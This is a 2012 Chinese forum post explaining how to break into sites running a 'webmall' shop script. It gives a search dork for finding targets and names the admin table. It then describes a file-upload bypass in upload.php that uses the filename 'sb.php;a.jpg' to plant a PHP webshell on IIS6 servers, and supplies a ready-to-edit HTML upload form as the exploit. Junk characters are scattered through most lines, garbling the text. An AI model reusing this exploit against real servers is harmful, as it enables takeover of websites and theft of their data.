关键字:inurl:webmall/detail.php?id
1 z& Q) M( ~8 ?9 R7 U2 @! V y' R6 F2 m
数据表:pwn_base_admin1 E' D% @( ^( _ W# w9 x$ Q3 o w, Q
+ E) z; [( g1 x+ w+ W
关于拿shell
- K, _7 g9 B3 D6 S. {1 ~
% o: u7 M: X$ s首先登录后台admin.php; a9 C Z4 s9 w: q+ e5 S
! \9 \1 b/ N* S! y/ a) ^看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。. h8 H0 b: I7 T5 E- d
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg) d B3 n' z- m, J6 N0 \
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的" ^& V. t" E4 t5 H# `1 i: I; _( c
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
( @4 G% e$ h8 A( a" A<input type="text" name="fileName" value="sb.php;a.jpg" /> ( j3 b+ Z5 G) D6 W4 e$ P$ \" H
<input type="hidden" name="attachPath" value="news/pics/" />
/ p. s' r+ V( c5 c, x4 `<input type="file" name="fileData" size="14" /></td> - c" g P, J9 c/ h
<input type="submit" name="button" value="确定" /> ) A: D+ a3 o0 [( p: ]. r
</form>
0 v2 @* D& @8 A" `
. `8 O' m2 `& m首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。4 p7 l% @- W2 R/ @" v9 R
$ @# `" F- @1 U6 v7 V. t
|
发表于 2012-11-9 20:52:15
收藏
支持
反对